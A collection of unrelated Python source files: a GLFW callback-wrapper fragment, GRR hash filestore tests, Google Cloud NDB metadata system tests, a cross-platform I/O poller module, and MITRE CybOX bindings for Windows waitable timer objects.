_glfw.%(callback)s(window, callback)
return old_callback""" % {'callback': callback, 'fun': fun}
return code
exec __callback__('Error')
exec __callback__('Monitor')
exec __callback__('WindowPos')
exec __callback__('WindowSize')
exec __callback__('WindowClose')
exec __callback__('WindowRefresh')
exec __callback__('WindowFocus')
exec __callback__('WindowIconify')
exec __callback__('FramebufferSize')
exec __callback__('Key')
exec __callback__('Char')
exec __callback__('MouseButton')
exec __callback__('CursorPos')
exec __callback__('Scroll')
exec __callback__('Drop')
|
|
#!/usr/bin/env python
"""Tests for grr.lib.aff4_objects.filestore."""
import os
import StringIO
import time
from grr.lib import action_mocks
from grr.lib import aff4
from grr.lib import config_lib
from grr.lib import flow
from grr.lib import rdfvalue
from grr.lib import test_lib
from grr.lib import utils
from grr.lib.aff4_objects import filestore
class FakeStore(object):
PRIORITY = 99
PATH = rdfvalue.RDFURN("aff4:/files/temp")
def __init__(self, path, token):
self.dest_file = aff4.FACTORY.Create(path, "AFF4MemoryStream",
mode="rw", token=token)
def AddFile(self, unused_blob_fd, sync=False):
_ = sync
return self.dest_file
def Get(self, _):
return True
class Schema(object):
ACTIVE = "unused"
class FileStoreTest(test_lib.AFF4ObjectTest):
"""Tests for file store functionality."""
def testFileAdd(self):
fs = aff4.FACTORY.Open(filestore.FileStore.PATH, "FileStore",
token=self.token)
fake_store1 = FakeStore("aff4:/files/temp1", self.token)
fake_store2 = FakeStore("aff4:/files/temp2", self.token)
with utils.Stubber(fs, "OpenChildren",
lambda: [fake_store1, fake_store2]):
src_fd = aff4.FACTORY.Create(aff4.ROOT_URN.Add("temp").Add("src"),
"VFSBlobImage", token=self.token, mode="rw")
src_fd.SetChunksize(filestore.FileStore.CHUNK_SIZE)
src_data = "ABC" * filestore.FileStore.CHUNK_SIZE
src_data_fd = StringIO.StringIO(src_data)
src_fd.AppendContent(src_data_fd)
fs.AddFile(src_fd)
# Reset file pointers
src_fd.Seek(0)
fake_store1.dest_file.Seek(0)
fake_store2.dest_file.Seek(0)
# Check file content got written to both data stores.
self.assertEqual(src_data, fake_store1.dest_file.Read(-1))
self.assertEqual(src_data, fake_store2.dest_file.Read(-1))
def testGetByPriority(self):
priority1 = aff4.FACTORY.Create("aff4:/files/1", "FileStore", mode="rw",
token=self.token)
priority1.PRIORITY = 1
priority1.Set(priority1.Schema.ACTIVE(False))
priority2 = aff4.FACTORY.Create("aff4:/files/2", "FileStore", mode="rw",
token=self.token)
priority2.PRIORITY = 2
priority3 = aff4.FACTORY.Create("aff4:/files/3", "FileStore", mode="rw",
token=self.token)
priority3.PRIORITY = 3
fs = aff4.FACTORY.Open(filestore.FileStore.PATH, "FileStore",
token=self.token)
with utils.Stubber(fs, "OpenChildren",
lambda: [priority3, priority1, priority2]):
child_list = list(fs.GetChildrenByPriority())
self.assertEqual(child_list[0].PRIORITY, 2)
self.assertEqual(child_list[1].PRIORITY, 3)
child_list = list(fs.GetChildrenByPriority(allow_external=False))
self.assertEqual(child_list[0].PRIORITY, 2)
class HashFileStoreTest(test_lib.AFF4ObjectTest):
"""Tests for hash file store functionality."""
def setUp(self):
super(HashFileStoreTest, self).setUp()
client_ids = self.SetupClients(1)
self.client_id = client_ids[0]
@staticmethod
def AddFileToFileStore(pathspec=None, client_id=None, token=None):
"""Adds file with given pathspec to the hash file store."""
if pathspec is None:
raise ValueError("pathspec can't be None")
if client_id is None:
raise ValueError("client_id can't be None")
urn = aff4.AFF4Object.VFSGRRClient.PathspecToURN(pathspec, client_id)
client_mock = action_mocks.ActionMock("TransferBuffer", "StatFile",
"HashBuffer")
for _ in test_lib.TestFlowHelper(
"GetFile", client_mock, token=token, client_id=client_id,
pathspec=pathspec):
pass
auth_state = rdfvalue.GrrMessage.AuthorizationState.AUTHENTICATED
flow.Events.PublishEvent(
"FileStore.AddFileToStore",
rdfvalue.GrrMessage(payload=urn, auth_state=auth_state),
token=token)
worker = test_lib.MockWorker(token=token)
worker.Simulate()
def AddFile(self, path):
"""Add file with a subpath (relative to winexec_img.dd) to the store."""
pathspec = rdfvalue.PathSpec(
pathtype=rdfvalue.PathSpec.PathType.OS,
path=os.path.join(self.base_path, "winexec_img.dd"))
pathspec.Append(path=path, pathtype=rdfvalue.PathSpec.PathType.TSK)
return self.AddFileToFileStore(pathspec, client_id=self.client_id,
token=self.token)
def testListHashes(self):
self.AddFile("/Ext2IFS_1_10b.exe")
hashes = list(aff4.HashFileStore.ListHashes(token=self.token))
self.assertEqual(len(hashes), 5)
self.assertTrue(rdfvalue.FileStoreHash(
fingerprint_type="pecoff", hash_type="md5",
hash_value="a3a3259f7b145a21c7b512d876a5da06") in hashes)
self.assertTrue(rdfvalue.FileStoreHash(
fingerprint_type="pecoff", hash_type="sha1",
hash_value="019bddad9cac09f37f3941a7f285c79d3c7e7801") in hashes)
self.assertTrue(rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="md5",
hash_value="bb0a15eefe63fd41f8dc9dee01c5cf9a") in hashes)
self.assertTrue(rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="sha1",
hash_value="7dd6bee591dfcb6d75eb705405302c3eab65e21a") in hashes)
self.assertTrue(rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="sha256",
hash_value="0e8dc93e150021bb4752029ebbff51394aa36f06"
"9cf19901578e4f06017acdb5") in hashes)
def testListHashesWithAge(self):
with utils.Stubber(time, "time", lambda: 42):
self.AddFile("/Ext2IFS_1_10b.exe")
hashes = list(aff4.HashFileStore.ListHashes(token=self.token, age=41e6))
self.assertEqual(len(hashes), 0)
hashes = list(aff4.HashFileStore.ListHashes(token=self.token, age=43e6))
self.assertEqual(len(hashes), 5)
hashes = list(aff4.HashFileStore.ListHashes(token=self.token))
self.assertEqual(len(hashes), 5)
def testHashAgeUpdatedWhenNewHitAddedWithinAFF4IndexCacheAge(self):
# Check that there are no hashes.
hashes = list(aff4.HashFileStore.ListHashes(token=self.token,
age=(41e6, 1e10)))
self.assertEqual(len(hashes), 0)
with utils.Stubber(time, "time", lambda: 42):
self.AddFileToFileStore(
rdfvalue.PathSpec(pathtype=rdfvalue.PathSpec.PathType.OS,
path=os.path.join(self.base_path, "empty_file")),
client_id=self.client_id, token=self.token)
hashes = list(aff4.HashFileStore.ListHashes(token=self.token,
age=(41e6, 1e10)))
self.assertTrue(hashes)
hits = list(aff4.HashFileStore.GetClientsForHash(hashes[0],
token=self.token))
self.assertEqual(len(hits), 1)
latest_time = 42 + config_lib.CONFIG["AFF4.intermediate_cache_age"] - 1
with utils.Stubber(time, "time", lambda: latest_time):
self.AddFileToFileStore(
rdfvalue.PathSpec(
pathtype=rdfvalue.PathSpec.PathType.OS,
path=os.path.join(self.base_path, "a", "b", "c", "helloc.txt")),
client_id=self.client_id, token=self.token)
# Check that now we have two hits for the previosly added hash.
hits = list(aff4.HashFileStore.GetClientsForHash(hashes[0],
token=self.token))
self.assertEqual(len(hits), 2)
# Check that new hit doesn't affect hash age.
hashes = list(aff4.HashFileStore.ListHashes(token=self.token,
age=(43e6, 1e10)))
self.assertFalse(hashes)
def testHashAgeUpdatedWhenNewHitAddedAfterAFF4IndexCacheAge(self):
# Check that there are no hashes.
hashes = list(aff4.HashFileStore.ListHashes(token=self.token,
age=(41e6, 1e10)))
self.assertEqual(len(hashes), 0)
with utils.Stubber(time, "time", lambda: 42):
self.AddFileToFileStore(
rdfvalue.PathSpec(pathtype=rdfvalue.PathSpec.PathType.OS,
path=os.path.join(self.base_path, "empty_file")),
client_id=self.client_id, token=self.token)
hashes = list(aff4.HashFileStore.ListHashes(token=self.token,
age=(41e6, 1e10)))
self.assertTrue(hashes)
hits = list(aff4.HashFileStore.GetClientsForHash(hashes[0],
token=self.token))
self.assertEqual(len(hits), 1)
latest_time = 42 + config_lib.CONFIG["AFF4.intermediate_cache_age"] + 1
with utils.Stubber(time, "time", lambda: latest_time):
self.AddFileToFileStore(
rdfvalue.PathSpec(
pathtype=rdfvalue.PathSpec.PathType.OS,
path=os.path.join(self.base_path, "a", "b", "c", "helloc.txt")),
client_id=self.client_id, token=self.token)
# Check that now we have two hits for the previosly added hash.
hits = list(aff4.HashFileStore.GetClientsForHash(hashes[0],
token=self.token))
self.assertEqual(len(hits), 2)
# Check that new hit affects hash age.
hashes = list(aff4.HashFileStore.ListHashes(token=self.token,
age=(43e6, 1e10)))
self.assertTrue(hashes)
def testGetClientsForHash(self):
self.AddFile("/Ext2IFS_1_10b.exe")
self.AddFile("/idea.dll")
hits = list(aff4.HashFileStore.GetClientsForHash(rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="md5",
hash_value="bb0a15eefe63fd41f8dc9dee01c5cf9a"), token=self.token))
self.assertListEqual(hits, [self.client_id.Add(
"fs/tsk").Add(self.base_path).Add("winexec_img.dd/Ext2IFS_1_10b.exe")])
def testGetClientsForHashWithAge(self):
with utils.Stubber(time, "time", lambda: 42):
self.AddFile("/Ext2IFS_1_10b.exe")
self.AddFile("/idea.dll")
hits = list(aff4.HashFileStore.GetClientsForHash(
rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="md5",
hash_value="bb0a15eefe63fd41f8dc9dee01c5cf9a"),
age=41e6,
token=self.token))
self.assertEqual(len(hits), 0)
hits = list(aff4.HashFileStore.GetClientsForHash(
rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="md5",
hash_value="bb0a15eefe63fd41f8dc9dee01c5cf9a"),
age=43e6,
token=self.token))
self.assertEqual(len(hits), 1)
hits = list(aff4.HashFileStore.GetClientsForHash(
rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="md5",
hash_value="bb0a15eefe63fd41f8dc9dee01c5cf9a"),
token=self.token))
self.assertEqual(len(hits), 1)
def testGetClientsForHashes(self):
self.AddFile("/Ext2IFS_1_10b.exe")
self.AddFile("/idea.dll")
hash1 = rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="md5",
hash_value="bb0a15eefe63fd41f8dc9dee01c5cf9a")
hash2 = rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="sha1",
hash_value="e1f7e62b3909263f3a2518bbae6a9ee36d5b502b")
hits = dict(aff4.HashFileStore.GetClientsForHashes([hash1, hash2],
token=self.token))
self.assertEqual(len(hits), 2)
self.assertListEqual(hits[hash1], [self.client_id.Add(
"fs/tsk").Add(self.base_path).Add("winexec_img.dd/Ext2IFS_1_10b.exe")])
self.assertListEqual(hits[hash2], [self.client_id.Add(
"fs/tsk").Add(self.base_path).Add("winexec_img.dd/idea.dll")])
def testGetClientsForHashesWithAge(self):
with utils.Stubber(time, "time", lambda: 42):
self.AddFile("/Ext2IFS_1_10b.exe")
self.AddFile("/idea.dll")
hash1 = rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="md5",
hash_value="bb0a15eefe63fd41f8dc9dee01c5cf9a")
hash2 = rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="sha1",
hash_value="e1f7e62b3909263f3a2518bbae6a9ee36d5b502b")
hits = dict(aff4.HashFileStore.GetClientsForHashes([hash1, hash2],
age=41e6,
token=self.token))
self.assertEqual(len(hits), 0)
hits = dict(aff4.HashFileStore.GetClientsForHashes([hash1, hash2],
age=43e6,
token=self.token))
self.assertEqual(len(hits), 2)
hits = dict(aff4.HashFileStore.GetClientsForHashes([hash1, hash2],
token=self.token))
self.assertEqual(len(hits), 2)
|
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
System tests for metadata.
"""
import pytest
from google.cloud import ndb
from test_utils import retry
_retry_assertion_errors = retry.RetryErrors(AssertionError)
@pytest.mark.usefixtures("client_context")
def test_kind_metadata(dispose_of):
from google.cloud.ndb.metadata import Kind
class AnyKind(ndb.Model):
foo = ndb.IntegerProperty()
class MyKind(ndb.Model):
bar = ndb.StringProperty()
entity1 = AnyKind(foo=1, id="x", namespace="_test_namespace_")
entity1.put()
dispose_of(entity1.key._key)
entity2 = MyKind(bar="x", id="x", namespace="_test_namespace_")
entity2.put()
dispose_of(entity2.key._key)
@_retry_assertion_errors
def query_metadata():
query = ndb.Query(kind=Kind.KIND_NAME, namespace="_test_namespace_")
results = query.fetch()
kinds = [result.kind_name for result in results]
assert all(kind in kinds for kind in ["AnyKind", "MyKind"])
query_metadata()
@pytest.mark.usefixtures("client_context")
def test_get_kinds(dispose_of):
from google.cloud.ndb.metadata import get_kinds
class AnyKind(ndb.Model):
foo = ndb.IntegerProperty()
class MyKind(ndb.Model):
bar = ndb.StringProperty()
class OtherKind(ndb.Model):
baz = ndb.IntegerProperty()
class SomeKind(ndb.Model):
qux = ndb.StringProperty()
entity1 = AnyKind(foo=1)
entity1.put()
dispose_of(entity1.key._key)
entity2 = MyKind(bar="a")
entity2.put()
dispose_of(entity2.key._key)
entity3 = OtherKind(baz=2)
entity3.put()
dispose_of(entity3.key._key)
entity4 = SomeKind(qux="a")
entity4.put()
dispose_of(entity4.key._key)
@_retry_assertion_errors
def query_metadata():
kinds = get_kinds()
assert all(
kind in kinds for kind in ["AnyKind", "MyKind", "OtherKind", "SomeKind"]
)
kinds = get_kinds(start="N")
assert all(kind in kinds for kind in ["OtherKind", "SomeKind"]) != []
assert not any(kind in kinds for kind in ["AnyKind", "MyKind"])
kinds = get_kinds(end="N")
assert all(kind in kinds for kind in ["AnyKind", "MyKind"]) != []
assert not any(kind in kinds for kind in ["OtherKind", "SomeKind"])
kinds = get_kinds(start="L", end="P")
assert all(kind in kinds for kind in ["MyKind", "OtherKind"]) != []
assert not any(kind in kinds for kind in ["AnyKind", "SomeKind"])
query_metadata()
@pytest.mark.usefixtures("client_context")
def test_namespace_metadata(dispose_of):
from google.cloud.ndb.metadata import Namespace
# Why is this not necessary for Kind?
Namespace._fix_up_properties()
class AnyKind(ndb.Model):
foo = ndb.IntegerProperty()
entity1 = AnyKind(foo=1, namespace="_test_namespace_")
entity1.put()
dispose_of(entity1.key._key)
entity2 = AnyKind(foo=2, namespace="_test_namespace_2_")
entity2.put()
dispose_of(entity2.key._key)
@_retry_assertion_errors
def query_metadata():
query = ndb.Query(kind=Namespace.KIND_NAME)
results = query.fetch()
names = [result.namespace_name for result in results]
assert all(name in names for name in ["_test_namespace_", "_test_namespace_2_"])
query_metadata()
@pytest.mark.usefixtures("client_context")
def test_get_namespaces(dispose_of):
from google.cloud.ndb.metadata import get_namespaces
class AnyKind(ndb.Model):
foo = ndb.IntegerProperty()
entity1 = AnyKind(foo=1, namespace="CoolNamespace")
entity1.put()
dispose_of(entity1.key._key)
entity2 = AnyKind(foo=2, namespace="MyNamespace")
entity2.put()
dispose_of(entity2.key._key)
entity3 = AnyKind(foo=3, namespace="OtherNamespace")
entity3.put()
dispose_of(entity3.key._key)
@_retry_assertion_errors
def query_metadata():
names = get_namespaces()
assert all(
name in names for name in ["CoolNamespace", "MyNamespace", "OtherNamespace"]
)
names = get_namespaces(start="L")
assert all(name in names for name in ["MyNamespace", "OtherNamspace"]) != []
names = get_namespaces(end="N")
assert all(name in names for name in ["CoolNamespace", "MyNamespace"]) != []
names = get_namespaces(start="D", end="N")
assert all(name in names for name in ["MyNamespace"]) != []
query_metadata()
@pytest.mark.usefixtures("client_context")
def test_property_metadata(dispose_of):
from google.cloud.ndb.metadata import Property
# Why is this not necessary for Kind?
Property._fix_up_properties()
class AnyKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
entity1 = AnyKind(foo=1, bar="x")
entity1.put()
dispose_of(entity1.key._key)
@_retry_assertion_errors
def query_metadata():
query = ndb.Query(kind=Property.KIND_NAME)
results = query.fetch()
properties = [
result.property_name for result in results if result.kind_name == "AnyKind"
]
assert properties == ["bar", "foo"]
query_metadata()
@pytest.mark.usefixtures("client_context")
def test_get_properties_of_kind(dispose_of):
from google.cloud.ndb.metadata import get_properties_of_kind
class AnyKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.IntegerProperty()
qux = ndb.StringProperty()
entity1 = AnyKind(foo=1, bar="x", baz=3, qux="y")
entity1.put()
dispose_of(entity1.key._key)
@_retry_assertion_errors
def query_metadata():
properties = get_properties_of_kind("AnyKind")
assert properties == ["bar", "baz", "foo", "qux"]
properties = get_properties_of_kind("AnyKind", start="c")
assert properties == ["foo", "qux"]
properties = get_properties_of_kind("AnyKind", end="e")
assert properties == ["bar", "baz"]
properties = get_properties_of_kind("AnyKind", start="c", end="p")
assert properties == ["foo"]
query_metadata()
@pytest.mark.usefixtures("client_context")
@pytest.mark.parametrize("namespace", ["DiffNamespace"])
def test_get_properties_of_kind_different_namespace(dispose_of, namespace):
from google.cloud.ndb.metadata import get_properties_of_kind
class AnyKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.IntegerProperty()
qux = ndb.StringProperty()
entity1 = AnyKind(foo=1, bar="x", baz=3, qux="y", namespace="DiffNamespace")
entity1.put()
dispose_of(entity1.key._key)
@_retry_assertion_errors
def query_metadata():
properties = get_properties_of_kind("AnyKind")
assert properties == ["bar", "baz", "foo", "qux"]
properties = get_properties_of_kind("AnyKind", start="c")
assert properties == ["foo", "qux"]
properties = get_properties_of_kind("AnyKind", end="e")
assert properties == ["bar", "baz"]
properties = get_properties_of_kind("AnyKind", start="c", end="p")
assert properties == ["foo"]
query_metadata()
@pytest.mark.usefixtures("client_context")
def test_get_representations_of_kind(dispose_of):
from google.cloud.ndb.metadata import get_representations_of_kind
class AnyKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.IntegerProperty()
qux = ndb.StringProperty()
entity1 = AnyKind(foo=1, bar="x", baz=3, qux="y")
entity1.put()
dispose_of(entity1.key._key)
@_retry_assertion_errors
def query_metadata():
representations = get_representations_of_kind("AnyKind")
assert representations == {
"bar": ["STRING"],
"baz": ["INT64"],
"foo": ["INT64"],
"qux": ["STRING"],
}
representations = get_representations_of_kind("AnyKind", start="c")
assert representations == {"foo": ["INT64"], "qux": ["STRING"]}
representations = get_representations_of_kind("AnyKind", end="e")
assert representations == {"bar": ["STRING"], "baz": ["INT64"]}
representations = get_representations_of_kind("AnyKind", start="c", end="p")
assert representations == {"foo": ["INT64"]}
query_metadata()
|
|
# Copyright 2016 Facebook Inc.
# Copyright 2016 Douban Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import select
# From python select module and Tornado source
_EPOLLIN = 0x001
_EPOLLPRI = 0x002
_EPOLLOUT = 0x004
_EPOLLERR = 0x008
_EPOLLHUP = 0x010
_EPOLLRDHUP = 0x2000
_EPOLLONESHOT = (1 << 30)
_EPOLLET = (1 << 31)
READ = _EPOLLIN
WRITE = _EPOLLOUT
ERROR = _EPOLLERR | _EPOLLHUP
MASK_ALL = 0xFFFF
class PollerImpl(object):
def poll(self, timeout):
raise NotImplementedError()
def register(self, fd, eventmask):
raise NotImplementedError()
def unregister(self, fd):
raise NotImplementedError()
def modify(self, fd, eventmask):
raise NotImplementedError()
class EpollImpl(PollerImpl):
"""
epoll wrapper. Only usable on Linux.
"""
def __init__(self):
super(EpollImpl, self).__init__()
self._epoll = select.epoll()
def __del__(self):
try:
self._epoll.close()
except:
# Doesn't matter
pass
def register(self, fd, eventmask):
self._epoll.register(fd, eventmask)
def unregister(self, fd):
self._epoll.unregister(fd)
def poll(self, timeout):
return self._epoll.poll(timeout)
def modify(self, fd, eventmask):
return self._epoll.modify(fd, eventmask)
class KQueueImpl(PollerImpl):
"""
kqueue wrapper. Only usable on BSD-like systems.
"""
def __init__(self):
super(KQueueImpl, self).__init__()
self._kqueue = select.kqueue()
self._events = {}
def __del__(self):
try:
self._kqueue.close()
except:
# Doesn't matter
pass
def _control(self, fd, eventmask, flags):
events = []
if eventmask & READ:
events.append(select.kevent(fd, filter=select.KQ_FILTER_READ, flags=flags))
if eventmask & WRITE:
events.append(select.kevent(fd, filter=select.KQ_FILTER_WRITE, flags=flags))
for ev in events:
self._kqueue.control([ev], 0)
def register(self, fd, eventmask):
assert fd not in self._events, 'File already registered'
self._events[fd] = eventmask
if eventmask != 0:
self._control(fd, eventmask, select.KQ_EV_ADD)
def unregister(self, fd):
assert fd in self._events, 'File not registered'
event = self._events.pop(fd)
if event != 0:
self._control(fd, event, select.KQ_EV_DELETE)
def poll(self, timeout):
retval = {}
kevents = self._kqueue.control(None, 1000, timeout)
for kevent in kevents:
ident = kevent.ident
if kevent.filter == select.KQ_FILTER_READ:
retval[ident] = retval.get(ident, 0) | READ
if kevent.filter == select.KQ_FILTER_WRITE:
if kevent.flags & select.KQ_EV_EOF:
retval[ident] = ERROR
else:
retval[ident] = retval.get(ident, 0) | WRITE
if kevent.flags & select.KQ_EV_ERROR:
retval[ident] = retval.get(ident, 0) | ERROR
return retval.items()
def modify(self, fd, eventmask):
self.unregister(fd)
self.register(fd, eventmask)
class PollImpl(PollerImpl):
def __init__(self):
self._poll = select.poll()
def __del__(self):
try:
self._poll.close()
except:
# Doesn't matter
pass
def register(self, fd, eventmask):
self._poll.register(fd, eventmask)
def unregister(self, fd):
self._poll.unregister(fd)
def poll(self, timeout):
return self._poll.poll(timeout)
def modify(self, fd, eventmask):
return self._poll.modify(fd, eventmask)
class SelectImpl(PollerImpl):
def __init__(self):
self._reading = set()
self._writing = set()
self._error = set()
def register(self, fd, eventmask):
if eventmask & READ:
self._reading.add(fd)
if eventmask & WRITE:
self._writing.add(fd)
if eventmask & ERROR:
self._error.add(fd)
def modify(self, fd, eventmask):
self.unregister(fd)
self.register(fd, eventmask)
def poll(self, timeout):
read, write, err = select.select(self._reading, self._writing, self._error, timeout)
events = {}
for fd in read:
events[fd] = events.get(fd, 0) | READ
for fd in write:
events[fd] = events.get(fd, 0) | WRITE
for fd in err:
events[fd] = events.get(fd, 0) | ERROR
return events.items()
def unregister(self, fd):
self._reading.discard(fd)
self._writing.discard(fd)
self._error.discard(fd)
def get_poller():
if hasattr(select, 'epoll'):
# Linux
return EpollImpl()
elif hasattr(select, 'kqueue'):
# BSD
return KQueueImpl()
elif hasattr(select, 'poll'):
# UNIX
return PollImpl()
elif hasattr(select, 'select'):
# Windows et al.
return SelectImpl()
else:
raise OSError('System not supported')
|
|
# Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
import sys
from mixbox.binding_utils import *
from . import cybox_common
from . import win_handle_object
class WaitableTimerType(cybox_common.BaseObjectPropertyType):
"""WaitableTimerType specifies Windows waitable timer types via a union
of the WaitableTimerTypeEnum type and the atomic xs:string type.
Its base type is the CybOX Core cybox_common.BaseObjectPropertyType, for
permitting complex (i.e. regular-expression based)
specifications.This attribute is optional and specifies the
expected type for the value of the specified property."""
subclass = None
superclass = cybox_common.BaseObjectPropertyType
def __init__(self, obfuscation_algorithm_ref=None, refanging_transform_type=None, has_changed=None, delimiter='##comma##', pattern_type=None, datatype='string', refanging_transform=None, is_case_sensitive=True, bit_mask=None, appears_random=None, observed_encoding=None, defanging_algorithm_ref=None, is_obfuscated=None, regex_syntax=None, apply_condition='ANY', trend=None, idref=None, is_defanged=None, id=None, condition=None, valueOf_=None):
super(WaitableTimerType, self).__init__(obfuscation_algorithm_ref, refanging_transform_type, has_changed, delimiter, pattern_type, datatype, refanging_transform, is_case_sensitive, bit_mask, appears_random, observed_encoding, defanging_algorithm_ref, is_obfuscated, regex_syntax, apply_condition, trend, idref, is_defanged, id, condition, valueOf_)
self.datatype = _cast(None, datatype)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if WaitableTimerType.subclass:
return WaitableTimerType.subclass(*args_, **kwargs_)
else:
return WaitableTimerType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_datatype(self): return self.datatype
def set_datatype(self, datatype): self.datatype = datatype
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(WaitableTimerType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, namespace_='WinWaitableTimerObj:', name_='WaitableTimerType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='WaitableTimerType')
if self.hasContent_():
lwrite('>')
lwrite(quote_xml(self.valueOf_))
self.exportChildren(lwrite, level + 1, namespace_, name_, pretty_print=pretty_print)
lwrite('</%s%s>%s' % (namespace_, name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='WinWaitableTimerObj:', name_='WaitableTimerType'):
super(WaitableTimerType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='WaitableTimerType')
if self.datatype is not None:
lwrite(' datatype=%s' % (quote_attrib(self.datatype), ))
def exportChildren(self, lwrite, level, namespace_='WinWaitableTimerObj:', name_='WaitableTimerType', fromsubclass_=False, pretty_print=True):
super(WaitableTimerType, self).exportChildren(lwrite, level, 'WinWaitableTimerObj:', name_, True, pretty_print=pretty_print)
pass
def build(self, node):
self.__sourcenode__ = node
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('datatype', node)
if value is not None:
self.datatype = value
super(WaitableTimerType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class WaitableTimerType
class WindowsWaitableTimerObjectType(cybox_common.ObjectPropertiesType):
"""The WindowsWaitableTimerObjectType is intended to characterize
Windows waitable timer (synchronization) objects."""
subclass = None
superclass = cybox_common.ObjectPropertiesType
def __init__(self, object_reference=None, Custom_Properties=None, xsi_type=None, Handle=None, Name=None, Security_Attributes=None, Type=None):
super(WindowsWaitableTimerObjectType, self).__init__(object_reference, Custom_Properties, xsi_type )
self.Handle = Handle
self.Name = Name
self.Security_Attributes = Security_Attributes
self.Type = Type
def factory(*args_, **kwargs_):
if WindowsWaitableTimerObjectType.subclass:
return WindowsWaitableTimerObjectType.subclass(*args_, **kwargs_)
else:
return WindowsWaitableTimerObjectType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Handle(self): return self.Handle
def set_Handle(self, Handle): self.Handle = Handle
def get_Name(self): return self.Name
def set_Name(self, Name): self.Name = Name
def validate_StringObjectPropertyType(self, value):
# Validate type cybox_common.StringObjectPropertyType, a restriction on None.
pass
def get_Security_Attributes(self): return self.Security_Attributes
def set_Security_Attributes(self, Security_Attributes): self.Security_Attributes = Security_Attributes
def get_Type(self): return self.Type
def set_Type(self, Type): self.Type = Type
def validate_WaitableTimerType(self, value):
# Validate type WaitableTimerType, a restriction on None.
pass
def hasContent_(self):
if (
self.Handle is not None or
self.Name is not None or
self.Security_Attributes is not None or
self.Type is not None or
super(WindowsWaitableTimerObjectType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, namespace_='WinWaitableTimerObj:', name_='WindowsWaitableTimerObjectType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='WindowsWaitableTimerObjectType')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s%s>%s' % (namespace_, name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='WinWaitableTimerObj:', name_='WindowsWaitableTimerObjectType'):
super(WindowsWaitableTimerObjectType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='WindowsWaitableTimerObjectType')
def exportChildren(self, lwrite, level, namespace_='WinWaitableTimerObj:', name_='WindowsWaitableTimerObjectType', fromsubclass_=False, pretty_print=True):
super(WindowsWaitableTimerObjectType, self).exportChildren(lwrite, level, 'WinWaitableTimerObj:', name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Handle is not None:
self.Handle.export(lwrite, level, 'WinWaitableTimerObj:', name_='Handle', pretty_print=pretty_print)
if self.Name is not None:
self.Name.export(lwrite, level, 'WinWaitableTimerObj:', name_='Name', pretty_print=pretty_print)
if self.Security_Attributes is not None:
self.Security_Attributes.export(lwrite, level, 'WinWaitableTimerObj:', name_='Security_Attributes', pretty_print=pretty_print)
if self.Type is not None:
self.Type.export(lwrite, level, 'WinWaitableTimerObj:', name_='Type', pretty_print=pretty_print)
def build(self, node):
self.__sourcenode__ = node
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
